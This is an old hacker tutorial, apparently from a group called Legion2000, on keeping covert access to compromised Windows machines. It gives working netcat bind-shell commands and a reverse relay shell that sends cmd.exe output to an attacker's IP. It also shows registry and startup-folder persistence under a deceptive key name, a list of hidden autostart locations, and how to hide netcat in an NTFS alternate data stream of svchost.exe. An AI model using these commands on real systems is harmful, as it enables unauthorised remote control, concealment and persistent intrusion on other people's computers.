Own a windows box using a windows box! This article will not show you how to hack into a windows system, but it will show you some good to know info about what to do once your there, and all examples will be possible to perform with a windows system. *nix users can of course follow these examples as well. Anyway; I will try to keep my blathering to a minimum and just stick to the raw info. Here we go! Once you’ve got access to the system, and played around a bit you will probably want to be able to revisit the system later on, and you will almost certainly want to be able to do so remotely. To achieve this you could for instance bind an application to a non-taken port, which will grant you access to the system. A very easy way of doing this is by using a sexy little program called netcat. You can fetch a copy of netcat (windows version) here: http://packetstormsecurity.org/Win/nc11nt.zip If you use *nix and don’t have a copy of netcat you can download it here: http://packetstormsecurity.org/UNIX/utilities/nc110.tgz Here is a working example on how to bind the command shell to the port 347455: nc -L -d -e cmd.exe -p 347455 To make this port binding occur on every system reboot you simple need to add a string containing the above netcat command to the auto start section of the registry or on some other place in the system which will make it start at boot up. Here is an example on how to accomplish that: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "DoNotMindMeAdmin"="c:\\temp\\nc -L -d -e cmd.exe -p 347455" To test if you can connect to the port and perform your dirty deeds you could use the following example: nc -nvv 127.0.0.1 347455 Everything would be just fine now…if the administrator was a blind crack head, but that is seldom the case…I guess! Using the registry section mentioned above is very common, and incredibly easy to spot by an administrator that is snooping around. So which other places in the registry or the system makes it possible to auto start a program on reboot? Well how about these: 1. START-UP FOLDER. Windows opens every item in the Start Menu's Start Up folder. This folder is prominent in the Programs folder of the Start Menu. Notice that I did not say that Windows "runs" every program that is represented in the Start Up folder. I said it "opens every item." There's an important difference. Programs represented in the Start Up folder will run, of course. But you can have shortcuts in the Start Up folder that represent documents, not programs. For example, if you put a Microsoft Word document in the Start Up folder, Word will run and automatically open that document at bootup; if you put a WAV file there, your audio software will play the music at bootup, and if you put a Web-page Favourites there, Internet Explorer (or your own choice of a browser) will run and open that Web page for you when the computer starts up. (The examples cited here could just as easily be shortcuts to a WAV file or a Word document, and so on.) 2. REGISTRY. Windows executes all instructions in the "Run" section of the Windows Registry. Items in the "Run" section (and in other parts of the Registry listed below) can be programs or files that programs open (documents), as explained in No. 1 above. 3. REGISTRY. Windows executes all instructions in the "RunServices" section of the Registry. 4. REGISTRY. Windows executes all instructions in the "RunOnce" part of the Registry. 5. REGISTRY. Windows executes instructions in the "RunServicesOnce" section of the Registry. (Windows uses the two "RunOnce" sections to run programs a single time only, usually on the next bootup after a program installation.) 7. REGISTRY. Windows executes instructions in the HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %* section of the Registry. Any command imbedded here will open when any exe file is executed. Other possibles: [HKEY_CLASSES_ROOT\exefile\shell\open\command] ="\"%1\" %*" [HKEY_CLASSES_ROOT\comfile\shell\open\command] ="\"%1\" %*" [HKEY_CLASSES_ROOT\batfile\shell\open\command] ="\"%1\" %*" [HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] ="\"%1\" %*" [HKEY_CLASSES_ROOT\piffile\shell\open\command] ="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] ="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] ="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] ="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] ="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] ="\"%1\" %*" If keys don't have the "\"%1\" %*" value as shown, and are changed to something like "\"somefilename.exe %1\" %*" than they are automatically invoking the specified file. 8. BATCH FILE. Windows executes all instructions in the Winstart batch file, located in the Windows folder. (This file is unknown to nearly all Windows users and most Windows experts, and might not exist on your system. You can easily create it, however. Note that some versions of Windows call the Windows folder the "WinNT" folder.) The full filename is WINSTART.BAT. 9. INITIALIZATION FILE. Windows executes instructions in the "RUN=" line in the WIN.INI file, located in the Windows (or WinNT) folder. 10. INITIALIZATION FILE. Windows executes instructions in the "LOAD=" line in the WIN.INI file, located in the Windows (or WinNT) folder. It also runs things in shell= in System.ini or c:\windows\system.ini: [boot] shell=explorer.exe C:\windows\filename The file name following explorer.exe will start whenever Windows starts. As with Win.ini, file names might be preceded by considerable space on such a line, to reduce the chance that they will be seen. Normally, the full path of the file will be included in this entry. If not, check the \Windows directory 11. RELAUNCHING. Windows reruns programs that were running when Windows shut down. Windows cannot do this with most non-Microsoft programs, but it will do it easily with Internet Explorer and with Windows Explorer, the file-and-folder manager built into Windows. If you have Internet Explorer open when you shut Windows down, Windows will reopen IE with the same page open when you boot up again. (If this does not happen on your Windows PC, someone has turned that feature off. Use Tweak UI, the free Microsoft Windows user interface manager, to reactivate "Remember Explorer settings," or whatever it is called in your version of Windows.) 12. TASK SCHEDULER. Windows executes auto run instructions in the Windows Task Scheduler (or any other scheduler that supplements or replaces the Task Scheduler). The Task Scheduler is an official part of all Windows versions except the first version of Windows 95, but is included in Windows 95 if the Microsoft Plus Pack was installed. 13. SECONDARY INSTRUCTIONS. Programs that Windows launches at start up are free to launch separate programs on their own. Technically, these are not programs that Windows launches, but they are often indistinguishable from ordinary auto-running programs if they are launched right after their "parent" programs run. 14. C:\EXPLORER.EXE METHOD. C:\Explorer.exe. Windows loads explorer.exe (typically located in the Windows directory) during the boot process. However, if c:\explorer.exe exists, it will be executed instead of the Windows explorer.exe. If c:\explorer.exe is corrupt, the user will effectively be locked out of their system after they reboot. If c:\explorer.exe is a trojan, it will be executed. Unlike all other auto start methods, there is no need for any file or registry changes - the file just simply has to be named c:\explorer.exe 15. ADDITIONAL METHODS. Additional auto start methods. The first two are used by Trojan SubSeven 2.2. HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\explorer\Usershell folders Icq Inet [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test] "Path"="test.exe" "Startup"="c:\\test" "Parameters"="" "Enable"="Yes" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\] This key specifies that all applications will be executed if ICQNET Detects an Internet Connection. [HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] ="Scrap object" "NeverShowExt"="" This key changes your file's specified extension. So enough about the registry! Let’s move on to another very important subject: Hiding your malicious tools! Hiding the tools you use is highly recommended! There are of course various ways of doing that, and I am not talking about just renaming your tools name to notepad.exe or similar, I am going to show you how to hide the tools inside other existing files. This technique is called Alternate Data Streams (ADS). To make this happen the windows system needs to be running at least one hard drive with the NT file system (NTFS), and luckily most systems do these days. And why do most windows systems use NTFS these days? Well it’s probably due to its stability, functionality, and the level of security that it provides. But why does NTFS support this thing called ADS? Well the main reason is for the compatibility with the Macintosh Hierarchical File System (HFS). Files stored on a HFS consist of two parts (known as forks) - one data fork, and one resource fork. Windows systems using NTFS relies on the extension of the file (eg. ".exe") in order to determine which program should be associated with that file. HFS uses the resource fork to do this. Windows systems using NTFS stores Macintosh resource forks in a hidden NTFS stream, with the data fork becoming the main parent file to the stream. And this is something you could really use to your advantage! An example on how to use ADS to hide netcat in a file: type c:\temp\nc.exe > %windir%\system32\svchost.exe:nc.exe The file svchost.exe will in no way show that it has been altered, not even the size will differ. The scary “good for you” part is that windows don’t even have any tool that will show you if a file has ADS attached. There are of course programs that do just that. Here is one of them: http://www.diamondcs.com.au/web/archive/adscheck.exe I will now show you how to access (in this case execute) a file, which is hidden in another file. Simply follow this example: start %windir%\system32\svchost.exe:nc.exe -L -d -e cmd.exe -p 347455 You should now alter the register so that the “now hidden” netcat can bind the command shell to a port; here is an example which is awfully similar to the last registry example: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "DoNotMindMeAdmin"="%windir%\\system32\\svchost.exe:nc.exe -L -d -e cmd.exe -p 347455" Of course you should place the hidden netcat auto start command in a more suitable location, get some inspiration from one of the many ways mentioned earlier! Just to over-demonstrate that ADS actually works I wrote this little lame c program: // ---- snipp --------------------- #include void main(void) { FILE* pFile; FILE* pADS; pFile = fopen("file.txt","w+"); fprintf(pFile,"I am an innocent text file."); pADS = fopen("file.txt:banana","w+"); fprintf(pADS,"Hi there! who do you want to own today?"); fclose(pFile); fclose(pADS); } // ---- snipp --------------------- The program will hopefully create a text file called (file.txt) which have an ADS called (banana). To view the text file you could use this example: more < file.txt To view the ADS you could use this example: more < file.txt:banana Splendid! Now you know how to auto execute a program on a system reboot (in this case the program is also hidden inside another file), and you know how to bind a shell to a port, so that you can access the system remotely whenever it suits you. But there is one important thing that could ruin the day for you! A firewall! And these days, most administrators do use them. The firewall is probably well configured and presumably fairly secure, as it should be! But it will definitely have some ports open, because if not the system would be a very lonely system, and doing anything remotely would be out of the question in the first place! Any who, I will show you a way of bypassing a firewall using netcat! To do this you will have to redirect some ports. The first thing you need to do is to setup two different ports on your own system, one port for sending and one port for receiving. This is easily done with netcat, and to make this example look authentic I will define an Internet protocol (IP) number that will represent the IP number of your system. Your systems IP will be: 60.7.8.9 Your sending port will be 1337. Open up a command shell and type in the following: nc –nvv –l –p 1337 Your receiving port will be 7331. Open up another command shell and type in the following: nc –vv –l –p 7331 On the system you want to have access to you add the following example: nc 60.7.8.9 1337 | cmd.exe | nc 60.7.8.9 7331 This will result in that everything you send to the port 1337 will be forwarded to the remote systems command shell and the output of the command shell be sent back to your systems port 7331. This example is only possible if the firewall grants you to use these ports, if not you simply set ports that the firewall do grant. Here is a small list of common ports: 20 FTP data (File Transfer Protocol) 21 FTP (File Transfer Protocol) 22 SSH (Secure Shell) 23 Telnet 25 SMTP (Send Mail Transfer Protocol) 43 whois 53 DNS (Domain Name Service) 68 DHCP (Dynamic Host Control Protocol) 79 Finger 80 HTTP (HyperText Transfer Protocol) 110 POP3 (Post Office Protocol, version 3) 115 SFTP (Secure File Transfer Protocol) 119 NNTP (Network New Transfer Protocol) 123 NTP (Network Time Protocol) 137 NetBIOS-ns 138 NetBIOS-dgm 139 NetBIOS 143 IMAP (Internet Message Access Protocol) 161 SNMP (Simple Network Management Protocol) 194 IRC (Internet Relay Chat) 220 IMAP3 (Internet Message Access Protocol 3) 389 LDAP (Lightweight Directory Access Protocol) 443 SSL (Secure Socket Layer) 445 SMB (NetBIOS over TCP) 666 Doom 993 SIMAP (Secure Internet Message Access Protocol) 995 SPOP (Secure Post Office Protocol) Ports between 1024 and 29151 are known as the Registered Ports. Basically, programs are supposed to register their use of these ports and thereby try to be careful and avoid stomping on each other. Here are some common ports and their programs. 1243 SubSeven (Trojan - security risk!) 1352 Lotus Notes 1433 Microsoft SQL Server 1494 Citrix ICA Protocol 1521 Oracle SQL 1604 Citrix ICA / Microsoft Terminal Server 2049 NFS (Network File System) 3306 mySQL 4000 ICQ 5010 Yahoo! Messenger 5190 AOL Instant Messenger 5632 PCAnywhere 5800 VNC 5900 VNC 6000 X Windowing System 6699 Napster 6776 SubSeven (Trojan - security risk!) 7070 RealServer / QuickTime 7778 Unreal 8080 HTTP 26000 Quake 27010 Half-Life 27960 Quake III So there you have it, some basic knowledge on how to make your conquered windows systems available in the future. Now remember that this is just one of the things you should do when you got access to a system, and it is not the most important part. I would say that the most important part is to cover your tracks properly, but I won’t get into that in this article. Good luck mate! /iqlord | Legion2000 Security Research References: http://www.governmentsecurity.org/articles/Placesthatvirusesandtrojanshideonstartup.php http://www.governmentsecurity.org/articles/CommonPorts.php http://patriot.net/~carvdawg/docs/dark_side.html